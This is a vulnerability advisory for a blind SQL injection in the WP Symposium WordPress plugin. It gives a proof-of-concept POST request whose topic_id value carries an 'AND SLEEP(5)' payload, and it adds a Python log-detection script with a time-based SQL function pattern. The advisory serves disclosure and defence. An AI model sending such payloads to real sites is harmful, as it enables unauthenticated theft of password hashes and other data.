Software: WP Symposium
Advisory report: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
CVE: Awaiting assignment
CVSS: 6.4 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:P)
Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data
An unauthenticated user can perform blind SQL injection against the site and extract password hashes and other information from the database.
Proof of concept
Perform the following POST request against a site with the plugin installed. The server will take over 5 seconds to respond:
POST /wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1421717320

action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0
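As an added illustration from the detection side (not part of dxw's advisory or the plugin's own code), the following Python inspects logged POST requests to the endpoint above for a non-integer topic_id or group_id and for time-based SQL functions, and correlates a hit with a slow response. The log records are constructed, and treating group_id as a numeric identifier is an assumption.

```python
import re
from urllib.parse import parse_qs

# Endpoint and action named in the advisory; the rule itself is an added illustration.
VULN_PATH = "/wp-content/plugins/wp-symposium/ajax/forum_functions.php"
VULN_ACTION = "getTopic"
# Parameters expected to be plain integers (group_id being numeric is an assumption).
ID_PARAMS = ("topic_id", "group_id")
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|waitfor|pg_sleep)\b", re.IGNORECASE)
SLOW_MS = 4000  # a trivial AJAX call should answer far faster than this

def inspect_request(method, path, body, response_ms):
    """Return a list of findings for one logged request (empty list = clean)."""
    findings = []
    if method != "POST" or not path.endswith(VULN_PATH):
        return findings
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("action") != VULN_ACTION:
        return findings
    for name in ID_PARAMS:
        value = params.get(name, "")
        if not value.isdigit():
            findings.append(f"{name} is not an integer: {value!r}")
        if TIME_FUNCS.search(value):
            findings.append(f"time-based SQL function in {name}")
    if findings and response_ms >= SLOW_MS:
        findings.append(f"slow response ({response_ms} ms) consistent with time-based blind SQLi")
    return findings

# Constructed sample records (not real traffic): (method, path, body, response time in ms)
SAMPLE_LOG = [
    ("POST", "/wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php",
     "action=getTopic&topic_id=1&group_id=0", 120),
    ("POST", "/wordpress/wp-content/plugins/wp-symposium/ajax/forum_functions.php",
     "action=getTopic&topic_id=1 AND SLEEP(5)&group_id=0", 5230),
    ("GET", "/wordpress/wp-login.php", "", 80),
]

def scan(records):
    """Map each record's index to its findings, skipping clean requests."""
    results = {}
    for i, (method, path, body, ms) in enumerate(records):
        findings = inspect_request(method, path, body, ms)
        if findings:
            results[i] = findings
    return results

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LOG).items():
        print(f"record {i}:", "; ".join(findings))
```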
Fix
Upgrade to version 15.8 or later.
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/
Please contact us on firstname.lastname@example.org to acknowledge this report if you received it via a third party (for example, email@example.com) as they generally cannot communicate with us on your behalf.
This vulnerability will be published if we do not receive a response to this report within 14 days.
Timeline
2015-07-14: Reported to firstname.lastname@example.org
2015-07-14: Requested CVE
2015-08-07: Vendor confirmed fixed in version 15.8
Discovered by dxw:
Please visit security.dxw.com for more information.